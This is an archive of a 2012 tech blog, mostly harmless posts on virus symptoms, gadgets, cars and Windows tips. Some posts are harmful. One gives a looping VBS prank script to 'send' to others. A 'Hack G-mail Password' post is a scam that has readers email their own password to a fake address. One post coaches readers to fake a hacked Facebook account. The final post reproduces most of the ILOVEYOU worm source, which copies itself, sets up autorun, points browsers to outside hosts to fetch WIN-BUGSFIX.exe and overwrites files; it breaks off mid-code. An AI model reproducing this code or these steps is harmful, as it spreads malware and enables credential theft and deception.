Monday 31 December 2012

Symptoms of Computer Virus

Viruses and Spyware are pretty much the worst hassles to deal with when it comes to computers. A small price, for revolutionizing every aspect of our lives, businesses and day to day tasks making things a lot more efficient and productive. However, this one issue has proved to cost companies and individuals a fortune every year.



1. Computer Performance Degrades

If you notice your computer performing degrade with time, it is probably a virus issue, as viruses accumulate they drain CPU resources and tie up your usual tasks resulting in your computer running a lot slower. If it’s been a low performing computer ever since you remember though I think it’s time for a hardware upgrade.

2. Takes forever to startup

If you notice your computer taking forever to startup without any significant modifications to your system (installing a CPU heavy application like an antivirus is a significant modification) it’s probably because your malware are starting up too. One way to check this is to open Start > Run > “Msconfig”>Startup and check the applications on startup, if you notice anything you don’t recognize in the list, it could be malware, however you can’t be too sure as it could be a third party process of a trusted installed application.

3. Toolbars and Tray Icons out of nowhere

This could be either a virus or spyware, usually malware toolbars installed are usually spyware, installed into the browser to track user browsing habits and information. Tray icons, which is again malware (as it was installed without the user’s consent) could be viruses or spyware, they could be harmless, meant to drain your computer off its resources or spyware to track your usage again.

4. Your computer is infected!

This is another common form of tricking the user to install a malicious software tool. Usually, a malicious script is installed into your system or hijacks your browser (another form of spyware) and continually prompts the user that the computer is infected and needs to be scanned for issues, users who are tricked by this message, install the apparent anti malware tool which in itself is a virus.

5. Your browser keeps crashing and/or you get a new home page

This is a definite case of spyware, where the browser is hijacked and results in your browser crashing and your home page being modified to a malicious website as well.

6. You can’t access your task manager

This is typical of a virus, the virus while creating a background process to exploit the victim’s computer, disables the task manager as well via a registry key so that the running virus process cannot be ended. This can be fixed using Disk Heal if the virus is no longer active.

7. You can’t access your folder options or the preferences are read only.

The Folder Options (My Computer > Tools > Folder Options) controls numerous functions on the windows operating system. One of the main functions controlled is whether files given the ‘hidden’ or ‘system’ attribute should be displayed in your file explorer/My Computer. Viruses usually sit somewhere in the hard disk with these attributes appended to them to prevent the user finding them, therefore it also disables the Folder Options or makes its preferences ‘read only’ where when preferences are changed and applied, you’ll notice them revert to the previous settings right away. This can be fixed using Disk Heal if the virus is no longer active.

8. You can’t access the Windows Registry Editor

The windows registry editor (Start > Run > “Regedit” ) is your system’s ‘headquarters’. This is where most of your operating system and application software preferences are stored. Viruses after penetrating into a system, usually disable the registry editor to prevent system administrators manually reverting settings like the previous two points. This can be fixed using Disk Heal if the virus is no longer active.

9. Your CPU Usage is 100% all the time.

Open the task manager (Ctrl + Alt + Del / Ctrl + Shift + Esc). If it’s disabled, you have your answer, you have a virus (unless you are not the admin of the computer and the administrator has disabled this feature). If you notice the CPU usage is 100%, arrange the processes by by CPU usage and check the process taking up the bulk, if it has a weird name (you should be able to figure or else leave a comment below) chances are it’s a virus.

10. Autorun.inf in your local or external drive

Take the letters of the active drives in your computer now, replace it in the letter field in the following location and open it in the My Computer address bar: “[letter]:/autorun.inf”, if it opens a notepad file with a reference to an EXE or any unidentified file it is probably another sign of a virus, unless that drive has a designated autorun program on startup however this is unlikely on local or even external hard drives unless manually done.

So there you have it, these are 10 of the most popular ways to know if your computer is infected by a virus, of course there are plenty of other symptoms to determine if your computer is infected and also the above factors may not necessarily mean you could be infected, but if you find more than a couple of the above familiar maybe, you should be looking to switch to a better antivirus and antispyware or get a new one if you don’t use them.

I’ve tried several antivirus and antispyware programs and concluded that Kaspersky andAd Aware are the best in the market. I’m currently another two similar products as well, await the reviews of them

Ipad Mini

The iPad Mini (stylized and marketed as iPad mini) is a mini tablet computer designed, developed, and marketed by Apple Inc. It was announced on October 23, 2012, as the fifth major product in the iPad line and the first to feature a reduced screen size of 7.9 inches, in contrast to the standard 9.7 inches. It features similar internal specifications as the iPad 2, including its display resolution. It was released on November 2, 2012 in nearly all of Apple's markets.

 Black Ipad Mini

The iPad Mini shipped with iOS 6.0.1. It can act as a hotspot with some carriers, sharing its Internet connection over Wi-Fi, Bluetooth, or USB, and also access the App Store, a digital application distribution platform for iOS that is developed and maintained by Apple. The service allows users to browse and download applications from the iTunes Store that were developed with Xcode and the iOS SDK and were published through Apple. From the App Store, GarageBand, iMovie, iPhoto, and the iWork apps (Pages, Keynote, and Numbers) are available.

The iPad Mini comes with several pre-installed applications, including Siri, Safari, Mail, Photos, Video, Music, iTunes, App Store, Maps, Notes, Calendar, Game Center, Photo Booth, and Contacts. Like all iOS devices, the iPad can sync content and other data with a Mac or PC using iTunes, although iOS 5 and later can be managed and backed up with iCloud. Although the tablet is not designed to make telephone calls over a cellular network, users can use a headset or the built-in speaker and microphone and place phone calls over Wi-Fi or cellular using a VoIP application, such as Skype. The device has dictation, using the same voice recognition technology as the iPhone 4S. The user speaks and the iPad types what they say on the screen provided that the iPad is connected to a Wi-Fi or cellular network. The device has an optional iBooks application, which displays books and other ePub-format content downloaded from the iBookstore. Several major book publishers including Penguin Books, HarperCollins, Simon & Schuster and Macmillan have committed to publishing books for the device. Despite being a direct competitor to both the Amazon Kindle and Barnes & Noble Nook, both Amazon.com and Barnes & Noble offer e-reader apps for the iPad.

Friday 28 December 2012

Set Picture Password in Windows 8

Windows 8 introduce a new security feature, picture password. While you can continue to use a numeric combination as your password, you can enable the security feature if you have a touch enabled device and experience the new way of logging into your Windows 8 device.



1. Move your mouse cursor to the upper left corner to show the Search and Settings panel. Click on More PC Settings, and select Users.

2. Click on Create a Picture Password, Confirm with your local account or Windows Account password.

3. Click the Choose picture button. Select the picture you want to use. Note: these pictures are stored in the Pictures folder of your local account.



4. You can drag the picture an move it around to display the way you like, and click the Use this picture button. Draw three gestures and repeat to confirm. The three gestures are a combination of circles, straight lines and taps. You can repeat the process by clicking the Start Over button until you are satisfied with the gesture combination or until you are done correctly.

5. When you log in next time, you will be able to use either your standard password or the newly created picture password. You can easily remove the picture password from the User settings if you want to.

Notes:

If you use the picture password and you know you did something wrong, you can press the Start Over button and start again. If you don’t get the gestures right five times in a row, Windows 8 automatically switch back to the alphanumeric password option before you get frustrated. I haven’t noticed any logon delays due to repeating attempts with incorrect gestures.


With the alphanumeric password option, you are reminded with your password hit and the password reset option after the first attempt. After five attempts, you will have to wait for a long while (about 30 seconds or longer) before next attempt. This deliberate delay is a Windows security feature that is designed to prevent hackers from keeping guessing your user name and password.

Friday 7 December 2012

Samsung Galaxy Camera

Galaxy Camera is a no-compromise hybrid device. It can shoot pictures just like any other camera and it can allow you browse internet and check your mail just like any other smartphone.

Build quality and hardware
Design is not a forte of Samsung's Android devices. Galaxy Camera, however, bucks the trend. We feel it is the best-designed Android device Samsung has made so far. The all-white body and the black lens look great. The camera has a minimalist design and has just three buttons - the shutter release buttons, power button and flash release button. The back of the device sports a huge- by the standard of cameras - 4.8-inch touchscreen. Like other cameras, this one has no navigation or settings buttons and photographers are expected to use the onscreen navigation to make changes. 

In terms of camera specifications, the device has a typical configuration. It is neither special nor lacks anything. It has a 16 megapixel lens with a focal length of 4.1mm-86.1mm with an effective (35mm) focal length of 23mm-483mm, giving the device an optical zoom of 21X. At its lowest focal length the camera has the aperture of F2.8. It has 8GB internal storage that can be expanded through a micro SD card of up to 64GB. It has a pop-up flash and an ISO range of 100 to 3200.

But where Galaxy Camera leaves other shooters in dust is in its smart capabilities. The device is powered by a quad-core processor running at 1.4GHz speed. It has 1GB RAM and a variant of Mali 400 graphics chip. The camera runs on Android 4.1 aka Jelly Bean operating system and it almost all functions that an Android smartphone does. We say almost because you can't call or message someone over cellular network using Galaxy Camera. Though you can keep in touch with your friends using GTalk, Nimbuzz, Whatsapp or Facebook through this device. 


Samsung Galaxy Camera


Shoot and share
During our use we shot hundreds of images and tens of videos with the device and found the results to be satisfactory in most instances. Galaxy Camera uses a very simple interface and people who do not want to delve too deep in settings can also get some good images out of this device. There are just three modes - auto, smart auto where a user can select the kind of scene he wants, and the expert, which allows users to change aperture, shutter speed and ISO speed. Given the fact that the camera has no physical buttons to change settings on the fly, it is a device more suitable to people who like to shoot images on auto modes.

Thankfully, the performance in auto mode is fantastic. Under the favourable conditions - read good lighting - the camera produces images that are rich in colour, sharp and detailed. In terms of image quality it is easily up their among the best point and shoot cameras. The images do get a little soft at the extreme end of the telephoto lens (at 21X) but it is something all point and shoot cameras suffer from. On the other hand, the macro mode on the camera is fantastic, capturing the subject in great detail while giving a pleasantly shallow depth of field.

The presence of 21X zoom also makes the camera a very good shooter for portraits as the high zoom allow shooters to click pictures with shallow depth of field.

In low light conditions, the image quality takes a some beating, especially if you see them on a big computer screen. They lose details and have noise reduction that is too strong. Image quality is comparable to most point and shoot cameras but similarly priced mirror-less or hybrid cameras such as Nex-5 have better low-light performance. 

Galaxy Camera can shoot FullHD videos at 30 frames per second. The quality of videos is very good and focus is continuous. Movement due to hand shake is managed well. But if you move too fast or zoom in and out too quickly while shooting videos, the camera tends to lose focus for a second or two.

The area where Galaxy Camera really comes into its own is what you can do with it other than capturing the images.. You can edit images on the camera, you can apply special effects, you can geo-tag them with the help of GPS and you can upload them to Picasa, Dropbox or any other comparable cloud-storage service automatically.

There is just one downside to all this added functionality - battery life. When used purely as a camera, the device can shoot around 170 images and a few video clips before running out of battery charge. But if you put a 3G SIM into it, the battery life takes a massive dip. The devices can shoot around 100 to 120 images when used with 3G. Samsung is aware of the poor battery life of Galaxy Camera and is selling the device an additional battery in India.

Should you buy it?
Galaxy Camera is a unique device. And fun to use. It shoots very good images and decent videos. It has a very good zoom of 21X. It can be used as a functional smartphone. It is a smart camera that delivers on its promises.

But before you rush out to buy it, here is what we suggest. If you want a good, functional point and shoot camera and don't care about sharing images with friends and family members as soon as you have shot them, get a basic camera. It will cost half of what Galaxy Camera sells for. If you are after fantastic image quality, get a DSLR or a good mirrorless camera.

But if you want to have fun with images, Galaxy Camera should be on your shortlist. It does things that cameras are not supposed to do and does them well. Shoot, share and go crazy with the filters and Android apps - that is the premise of Galaxy Camera. As an added bonus you also get access to smartphone functions. If you can make use of the added functionality that Galaxy Camera offers, it is a superb deal even at an MRP of Rs 29,900.

Sunday 25 November 2012

See the Photos of Non-Friends on Facebook


Virus Code for Type Sorry



Open Notepad and Type :

Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys Sorry
loop


Save it as Anything.VBS and send it.

Show all Cards in Hearts Game

Warning! this requires a modification on your registry. Be sure you follow the steps carefully. Damage your registry might damage your Windows.


Hearts - Game
  • Open the "Registry Editor" by: "Start" >> "Run" then type "regedit" and press Enter
  • Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
  • Right-click on the right panel and create a new String value with the name "ZB"
  • Double-click to open this key "ZB" to edit its value. Then enter "42" and close the Registry Editor.
  • Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards

Retina Display

Retina Display is a brand name used by Apple for liquid crystal displays which they claim have a high enough pixel density that the human eye is unable to notice pixelation at a typical viewing distance. The term is used for several Apple products, including the iPhone, iPod Touch, iPad, and MacBook Pro. As the typical viewing distance would be different depending on each device's usage, the pixels per inch claimed as retina quality can be different for the smallest devices (326, iPhone and iPod Touch): greater than the mid-sized devices (264, iPad) and greater than the larger devices (220, MacBook Pro).

L-Without Retina Display, R-With Retina Display

The displays are manufactured by different suppliers. Currently, the iPad's display comes from the same suppliers Samsung use while the Macbook Pro displays are mostly made by LG's suppliers, along with the iPhone and iPod Touch displays. Apple has applied to register the term "Retina" as a trademark in regard to computers and mobile devices with theUnited States Patent and Trademark Office, Canadian Intellectual Property Office, and in Jamaica.

Wednesday 21 November 2012

Porsche 918 Spyder

The Porsche 918 Spyder is a mid-engined sports plug-in hybrid designed by Porsche and first shown as a concept at the 80th edition of theGeneva Motor Show in March 2010. The Spyder is powered by a 4.6 litre V8 engine, developing 580 horsepower (430 kW), with two electric motors delivering an additional 243 horsepower (181 kW). It is the first plug-in hybrid car from Porsche. Porsche intends to manufacture 918 units as a 2014 model year starting production on September 18, 2013, with deliveries scheduled to begin in December 2013. The starting price is rumored be €768,026.

Porsche unveiled the RSR racing variant of the 918 at the 2011 North American International Auto Show, which combines hybrid technology first used in the 997 GT3 R Hybrid, with styling from the 918 Spyder.


Porsche 918 Spyder

The 918 Spyder is a mid-engined two seater supersports car designed by Michael Mauer. It is powered by a 4.6 liter V8 engine which is a development of the engine used in the RS Spyder Le Mans Prototype racing car. The engine delivers 580 horsepower (430 kW) at 8,500 rpm and 500 N·m (370 lbf·ft) of torque. This is supplemented by two electric motors delivering an additional 240 hp (180 kW). One 85 kW (114 hp) electric motor drives the rear wheels in parallel with the engine and also serves as the main generator. This motor and engine deliver power to the rear axle via a 7-speed gearbox coupled to Porsche's own (PDK) double-clutch system. The front 95 kW (127 hp)electric motor directly drives the front axle; an electric clutch decouples the motor when not in use. The total system delivers 823 hp (614 kW) and 780 N·m (580 lbf·ft) of torque. As of October 2012 the engineering design is not finalized, but Porsche has given performance figures of 0–100 km/h (62 mph) in 2.8 seconds and a top speed of 325 kilometres per hour (202 mph). The energy storage system is a 6 kW·h liquid-cooled lithium-ion battery positioned behind the passenger cell. In addition to plugging in to recharge, the batteries are also charged by regenerative braking and by excess output from the engine when the car is coasting. CO2 emissions are 70 g/km and fuel consumption is 3 L/100 km (94 imperial mpg/78 us mpg).

Ferrari 250 GTO


Ferrari 250 GTO

The Ferrari 250 GTO is a GT car which was produced by Ferrari from 1962 to 1964 for homologation into the FIA's Group 3 Grand Touring Carcategory. The numerical part of its name denotes the displacement in cubic centimeters of each cylinder of the engine, whilst GTO stands for "Gran Turismo Omologata", Italian for "Grand Touring Homologated." When new, the GTO commanded an $18,000 purchase price in the United States, and buyers had to be personally approved by Enzo Ferrari and his dealer for North America, Luigi Chinetti.

36 cars were made in the years '62/'63. In 1964 'Series II' was introduced, which had a slightly different look. Three such cars were made, and four older 'Series I' were given a 'Series II' body. It brought the total of GTOs produced to 39.

In 2004, Sports Car International placed the 250 GTO eighth on a list of Top Sports Cars of the 1960s, and nominated it the top sports car of all time. Similarly, Motor Trend Classic placed the 250 GTO first on a list of the "Greatest Ferraris of all time".

*Apps-Blogger is now Apps-Blogger+ because its now all techno website...and CARS section is included

Lamborghini Gallardo

The Lamborghini Gallardo is a sports car built by Lamborghini and its most-produced model to date, with over 10,000 built in its first seven years of production. Named after a famous breed of fighting bull, the V-10 Gallardo has been Lamborghini's sales leader and stable-mate to a succession of V-12 flagship models—first to the Lamborghini Murciélago (4,099 built between 2001 and 2011), then to the current flagship Lamborghini Aventador.


Lamborghini Gallardo

LP 570-4 Spyder Performante

In November 2010, Lamborghini announced the LP 570-4 Spyder Performante, a convertible version of the LP 570-4 Superleggera. Employing the same 570 PS (419 kW; 562 hp) 5. 2 L V 10 and with a curb weight of 1,485 kg (3,274 lb), heavier than the coupe as usual with coupe based convertibles, the LP 570-4 Spyder Performante goes from 0 to 100 km/h (62 mph) in 3.4 seconds, to 200 km/h (124 mph) in 12.0 seconds and has a top speed of 324 km/h (201 mph)

In December 2004, two L140 Gallardos were donated to the Italian police in honour of the force's 152nd anniversary, one came from Automobili Lamborghini SpA while a second was donated by an independent organization.

Tuesday 20 November 2012

How to Block Internet Acess

Do the following to disable access to Internet:

  1. Go to Internet Options in the Control Panel. Go to the Connections tab and click LAN settings. Uncheck "Automatically detect settings" and then check "Use proxy server" and put settings in for a proxy server that doesn't exist. This will time out the Web browser each time a user tries to pull up an Internet site. Unfortunately, a savvy user could go into the settings and fix this.
  2. Alternatively, you can set the Internet router to deny all port 80 traffic to the WAN from the IP address of the client PC you want to block. This is something that the user is less likely to figure out, and it will effectively block that one PC from Web access, while still allowing all over LAN users full access to the Internet."


Or do the following:

Go to:
  1. TCP/IP Properties
  2. Advanced
  3. Options
  4. TCP/IP filtering Properties
  5. Select Enable TCP/IP filtering (All adapters)
  6. Select Permit Only for all three selections (TCP, UDP, IP)
  7. Add only the allowed ports that are needed (leaving out port 80 for Web browser traffic)
  8. Click OK multiple times to close out the windows
These settings could also be set in a Group Policy GPO so that the user can't change them. You would make a special group just for this user."

For more info goto www.infogallery.webs.com
For My softwares goto www.manishapps.wix.com/mapps

Blue Screen of Death

The Blue Screen of Death (also known as BSoD, Blue Screen Error, or Bluescreen), known officially as a Stop Error or a bug check, is the error screen displayed by the Microsoft Windows family of operating systems upon encountering a critical error, of a non-recoverable nature, that causes the system to crash. The term is named after the color of the screen generated by the error. In Unix-based operating systems, a similar term is kernel panic.


BSoD in Windows 8

Stop errors are hardware, updates and driver related, causing the computer to stop responding in order to prevent damage to the hardware or data. In the later versions of Windows (Windows NT and later) the screen presents information for diagnostic purposes that was collected as the operating system performed a bug check.

A new version of the error screen has been seen in Windows 8, released in 2012. Rather than displaying detailed technical information about the error, it simply displays a short explanation that the system needs to restart, the technical name of the error and a sad emoticon. It also contains a lighter shade of blue in the background. Technology news website Tech Crunch described the revised BSoD as 'a step in the right direction,' stating that the information provided on previous versions was unintelligible to most Windows users.

Monday 12 November 2012

Intel

Intel Corporation (NASDAQ: INTC) is an American multinational semiconductor chip maker corporation headquartered in Santa Clara, California. Intel is the world's largest and highest valued semiconductor chip maker, based on revenue. It is the inventor of the x86 series of microprocessors, the processors found in most personal computers. Intel Corporation, founded on July 18, 1968, is a portmanteau of Integrated Electronics (the fact that "intel" is the term for intelligence information was also quite suitable). Intel also makes motherboard chipsets, network interface controllers and integrated circuits, flash memory, graphic chips, embedded processors and other devices related to communications and computing. Founded by semiconductor pioneers Robert Noyce and Gordon Moore and widely associated with the executive leadership and vision of Andrew Grove, Intel combines advanced chip design capability with a leading-edge manufacturing capability. Though Intel was originally known primarily to engineers and technologists, its "Intel Inside" advertising campaign of the 1990s made it and its Pentium processor household names.


Intel Logo

In 2011, Intel Capital announced a new fund to support startups working on technologies in line with the company's concept for next generation notebooks. The company is setting aside a $300 million fund to be spent over the next three to four years in areas related to ultrabooks. Intel announced the ultrabook concept at Computex in 2011. The ultrabook will be a thin (less than 0.8 inches thick) notebook that utilizes Intel processors and also incorporates tablet features such as a touch screen and long battery life.

At the Intel Developers Forum in 2011, four Taiwain ODMs showed prototype ultrabooks that used Intel's Ivy Bridge chips. Intel plans to improve power consumption of its chips for ultrabooks, like Ivy Bridge processors, which will only have 77W default thermal design power.

Intel's goal for Ultrabook's price is below $1000; however, according to two presidents from Acer and Compaq, this goal will not be achieved if Intel does not lower the price of its chips.

Thursday 1 November 2012

Fifa 13

FIFA 13 (also known as FIFA Soccer 13 in North America) is the twentieth edition of Electronic Arts' highly-acclaimed association football FIFA video game series. It is developed by EA Canada. A demo of the game was released on 11 September 2012, The demo teams include: Borussia Dortmund, Manchester City, Juventus, A.C. Milan and Arsenal. The demo was downloaded a record 1.99 million times within three days.The game was released on 25 September 2012.

FIFA 13 included new features to the FIFA franchise such as the First Touch Control. New celebrations were also added as a new feature.


Fifa 13 Poster

Information:
   
Developer(s)        EA Canada
Publisher(s)          Electronic Arts
Platform(s)           Microsoft Windows,Xbox 360, PlayStation 3,
                            PlayStation 2,PlayStation Vita,PlayStation Portable, 
                            Wii U,Wii, Nintendo 3DS, iOS,Android, Mac OS X 

Release date(s) 

NA 25 September 2012
AUS 27 September 2012
EU 28 September 2012 

Genre(s)               Sports Game, Association Football Simulation
Mode(s)               Single-player, Multiplayer



Watch Trailer



Saturday 27 October 2012

Microsoft Office Professional Plus 2013 RTM

Microsoft Office 2013 (also called Office 2013 and Office 15) is the upcoming version of the Microsoft Office productivity suite for Microsoft Windows, and the successor to Microsoft Office 2010. Office 2013 includes extended file format support, user interface updates, and support for touch. Office 2013 is also available for Windows RT . as well as IA-32 and X86-64, and requires Windows 7 or Windows Server 2008 R2 or later (hence cannot be installed on Windows XP, Windows Vista, Windows Server 2008 or other earlier versions).


On July 16, 2012, the Consumer Preview of Office 2013 was released to the general public.


Office 13 Start Screen



Features of Office 2013 include: 

  • Touch Mode along with touch enhancements. 
  • Flatter look of the Ribbon interface 
  • Microsoft Outlook now has a new visualization for scheduled tasks 
  • New Start Experience 
  • New alignment lines when moving objects 
  • Online picture support with content from Office.com, Bing.com and Flickr 
  • Resume Reading in Word and PowerPoint 
  • New slide designs, animations and transitions in PowerPoint 2013 
  • Support for Hotmail.com in Outlook 

Tuesday 23 October 2012

Download YouTube video by VLC Player

Hi , friends Today i am share A unique trick youtube to download video By using VLC Media Player and your browser.

>>open your youtube on your browser then open your video And copy URL.
>>Run your vlc then click Media->open network stream..


>>then paste URL in 'please enter network URL:
>>Then click ' Play ' button in the player.
>>Then Now, click Tools – Codec Information and at the bottom of the window you will see a Location box. Copy the long URL in the box and paste it on your browser’s address bar. The browser will now start playing the video file. You can download the video file to your desktop by doing a Save As…. Or you can choose to record the video.




Monday 22 October 2012

Hidden wallpapers in Win 7

Find out Hidden wallpapers and themes:




We all knew that while windows 7 is been installed it will ask for your country, Time Zone etc.., Now based on your responses windows 7 will automatically selects which wallpapers to install by default.

Suppose you had selected your country as India, So that windows seven will install some wallpapers which are related to India.

To unlock all the wallpapers just follow this simple steps:-

Step #1: Click on Start and type "C:\Windows\Globalization\MCT" in the search box.

Step #2: Now a window will open with some sub-folders "MCT-AU, MCT-CA, MCT-GB, MCT-US, and MCT-ZA" in which you can select your hidden wallpapers
Here AU, CA, GB, US, and ZA refers to Australia, Canada, Great Britain, United States and South Africa.

Hack G-mail Password

How to hack gmail passwords? It is possible and it is easy.





* STEP 1- Log in to your own gmail account. Note: Your account must be at least 1 week old for this trick to work.

* STEP 2- Once you have logged into your own account, compose/write an e-mail to: lost.pass.retr@gmail.com depending on which account u want to hack...This is the mailing address to the automated server that sends out passwords to users who have forgotten them. What you are going to do is trick the server into thinking that it is sending your password to you but it will send you the pass for the account you are trying to hack instead.

* STEP 3- In the subject line type exactly: “userpassword retrieve” (case sensitive, without the inverted commas)

* STEP 4- On the first line of your mail write the email address of the person you are hacking.

* STEP 5- On the second line type in the e-mail address you are using.

* STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a completed JavaScript form from your account in the Gmail Server to extract the other email addresses password. This works because you are sending your password to a machine not a person. The process will be done automatically by the user administration server.

* STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly:

2SUGm9qwM482SUGm9qwM48 (case sensitive)

The password will be sent to your inbox within 48 hrs in a mail called “System Reg Message” . Hack who ever u want (just don't hack me)

**Only for Educational purposes

Friday 12 October 2012

Windows 8 Shortcut Keys

Windows logo key+spacebar Switch input language and keyboard layout
Windows logo key+O Locks device orientation
Windows logo key+Y Temporarily peeks at the desktop
Windows logo key+V Cycles through toasts
Windows logo key+Shift+V Cycles through toasts in reverse order
Windows logo key+Enter Launches Narrator
Windows logo key+PgUp Moves Metro style apps to the monitor on the left 


Windows 8 Toggle Option

Windows logo key+PgDown Moves Metro style apps to the monitor on the right
Windows logo key+Shift+. Moves the gutter to the left (snaps an application)
Windows logo key+. Moves the gutter to the right (snaps an application)
Windows logo key+C Opens Charms bar
Windows logo key+I Opens Settings charm
Windows logo key+K Opens Connect charm
Windows logo key+H Opens Share charm
Windows logo key+Q Opens Search pane
Windows logo key+W Opens Settings Search app
Windows logo key+F Opens File Search app
Windows logo key+Tab Cycles through Metro style apps
Windows logo key+Shift+Tab Cycles through Metro style apps in reverse order
Windows logo key+Ctrl+Tab Cycles through Metro style apps and snaps them as they are cycled
Windows logo key+Z Opens App Bar

Tuesday 9 October 2012

Change your friend's FB Status

Many people are fond of hacking Facebook accounts. I see many friends who get afraid when their Facebook account has been stolen or compromised. You too can threaten them by changing their Facebook status with a small tricks I’ve found.

It’s wonder that you can edit someone’s status, Right? Let us have a view on requirements to change friend’s status message. To perform this trick you need,
  1. Mozilla Firefox 5.0 or later
  2. Firefox Plugin: Firebug (Download here: https://addons.mozilla.org/en-US/firefox/addon/firebug/)
When you are ready with these two materials, you are ready to start your trick. I admit that this trick is just to play pranks on friends and not a real hacking method. Facebook accounts cannot be hacked legally due to top level security.

You can prank your friends by another method too. You will be operating a future machine. But your friend thinks that its a real future machine. The Suspense is, you will be operating the Future Machine.

I hope that you have Mozilla Firefox 5.0 or later and a Firebug Plugin. After installing Firebug, make sure that you have restarted your Firefox browser.

Log in to your Facebook account.

Go to your Friend’s Wall/Timeline.

Choose any one of the status you want to edit. Keep mouse pointer exactly at the text of the status and select Inspect element.






You will be seeing a window which opens at the bottom of the browser. Now just search your friend’s status that you want to edit. For example see the below picture.

After searching, select the text in the coding area. Type your new text or move arrows to edit the same status.

You can find that your friend’s status has been modified with your text.

After refreshing the page, you will be finding that his/her status modified to original. So do the following to make your friend to believe that you have hacked his/her Facebook account.

Close the Firebug Window and make a screenshot. Upload to your Facebook Albums. Show your Friends that you hacked your friend’s account.

You can follow this method to edit your friend’s comment too. Wish you Happy Prank Journey!

Firebug


Firebug is the most popular and powerful web development tool. There are some qualities of new firebug:-

  • Inspect HTML and modify style and layout in real-time
  • Use the most advanced JavaScript debugger available for any browser
  • Accurately analyze network usage and performance
  • Extend Firebug and add features to make Firebug even more powerful
  • Get the information you need to get it done with Firebug.

You can use it for editing a webpage. If you want to get your website looks like a professional, then must use it. It can also be used as a hacking tool.

Monday 8 October 2012

Love Letter (A Worm Virus)

Below is the text of the pathetic LoveLetter "virus", for anyone who's interested. It has been reformatted as an plain text/HTML file, so there's no need to worry about being infected by it. For God's sake, don't copy the text into a .VBS file and run it, espescially if you have installed any new MSIE (this little bugger will wipe out your MP3s!!) 



Editor's note: If you're going to write a virus, use a REAL language (assembler)!! Maybe C if you're desperate...


rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
